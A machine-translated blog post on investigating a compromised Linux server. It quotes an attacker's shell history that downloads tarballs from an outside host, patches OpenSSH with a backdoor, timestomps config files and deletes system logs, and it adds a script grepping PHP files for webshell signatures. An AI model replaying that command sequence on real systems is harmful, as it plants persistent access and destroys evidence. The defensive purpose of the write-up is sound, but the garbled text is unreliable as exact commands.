The experience and solution of SSH being implanted back door

Yesterday found the server above a lot of programs are hanging horse, with the development of processing the hanging horse files, this morning found the game backstage and open, on the server found backstage program entry files are deleted, restored index.php, Admin.php after the normal access, night no one on the server, you can determine the server has been compromised, began to troubleshoot:

1. First look at the security log and specify the following command:

More/var/log/secure |grep Accepted

By looking at the output of the command, several of the following records are questionable:

Jul 05:32:17 localhost sshd[21684]: Accepted password for root from 103.231.104.70 Port 3551 Ssh2jul-05:37:52 Localh OST sshd[22754]: Accepted password for root from 103.231.104.70 Port 3602 ssh2jul (05:44:40 localhost sshd[23396]: accep Ted password for root from 103.231.104.70 Port 3650 SSH2

This record shows 5:32 through the root account from 103.231.104.70 this IP successful login to the system,103.231.104.70 This IP, after the discovery of the SAR is an address, should be agent of the machine

2. Start viewing system log message and Wtmp logs, and no problems found

3. Start viewing the history command and discover the problem:

  387  cp -p /etc/ssh/sshd_config{,.bak}  388  wget  www.k2a.cn/tools/open.tar.gz  406  cd /etc/ssh/  407  ls   408  wget www.k2a.cn/Tools/patch.tar.gz  409  ls  410   tar -zxvf open.tar.gz  411  tar -zxvf patch.tar.gz   412&NBSP;&NBSP;CD&NBSP;OPENSSH-5.9P1.PATCH/&NBSP;&NBSP;413&NBSP;&NBSP;CP&NBSP;SSHBD5.9P1.DIFF&NBSP, .... /OPENSSH-5.9P1&NBSP;&NBSP;414&NBSP;&NBSP;CD&NBSP, .... /openssh-5.9p1  415  patch < sshbd5.9p1.diff  416  vim  includes.h  417  ssh -V  418  vim includes.h   419  vi version.h   420  ssh -V  421   Vi version.h   422  ./configure --prefix=/usr/ --sysconfdir=/etc/ssh/ --with-pam --with-kerberos5  423  make  424   make install  425  id  426  touch -r sshd_ CONFIG.BAK&NBSP;SSH_CONFIG&NBSP;&NBSP;427&NBSP;&NBSP;CD&NBSP, ....   428  touch -r sshd_config.bak ssh_config  429   Service sshd reload  430  ls  431  rm -rf *.tar.gz   432  rm -rf open*  433  rm -rf *.bak   437  cd /var/log/  439  rm -rf wtmp  440  rm  -rf *log  442  cd /etc/scl/prefixes/  448  rm -rf  *

Through the history above can be found that the attacker installed on the server SSH backdoor, about the SSH backdoor article I also queried a few, interested friends can see:

Http://www.freebuf.com/tools/10474.html

http://redkey.blog.51cto.com/335290/1345091

As stated in the previous article, the attacker has modified the version of SSH, using ssh-v to view the scenarios that are still in the previous version and are currently being processed urgently:

1. Reload OpenSSH software, update to latest version

2. Replace the SSH default port

3. To add an SSH access policy in iptable

When reloading the new version of OpenSSH, the make && make install error is as follows:

Cannot remove '/usr/bin/ssh ': Operation not permitted

Use lsattr to see that SSH has added Usia properties, use Chattr to remove all these properties after the reinstallation is normal!

Use Ssh-v to see if the version is correct again after installation

Development colleagues also help find the Trojan in the code, using the following script:

#!/bin/bash#re=$ (find -name  "*.php"  |xargs grep -l  "common") if [ !  -d  "$myPath"]; then        mkdir /tmp/ Safelogfifunction checksafe () {   path= "/home/web/$1"    cd  $path      #re =$ (find -name  "*.php"  |xargs egrep  "phpspy|c99sh|milw0rm|eval\ ( Gunerpress|eval\ (BASE64_DECOOLCODE|SPIDER_BC ")    re=$ (find -name " *.php " |xargs  egrep  "Phpspy|c99sh|milw0rm|eval\ (gunerpress|eval\ (base64_decoolcode|spider_bc|eval\ (\\$\_POST\[| Assert\ (\\$\_post\[")    len=$ (expr length " $re ")    if [ $ ( echo  "$len  > 0"  | BC)  -eq 1 ]; then                   echo  "$re"  >  /opt/safelog/$1_$ (date +%y%m%d).txt          #echo   "$re"  >  $path/cache/safelog/ $ (date +%y%m%d) .txt   fi   modifytime  $i}function modifytime () {     re=$ (find -mtime -1 -type f -name \*.php)      len=$ (expr length  "$re")     if [  $len  -gt 0  ]; then            echo  "$re"  > /opt/safelog/$1_mf_$ (date +%y%m%d) .txt        #echo   $re  >  $path/cache/safelog/mf_$ (date +%y%m%d) txt    fi}ls=$ (CD  /HOME/WEB;LS) for i in  $lsdo   echo  "$i"   checksafe  $idone

This article from the "Operation and maintenance of the road" blog, declined to reprint!

The experience and solution of SSH being implanted back door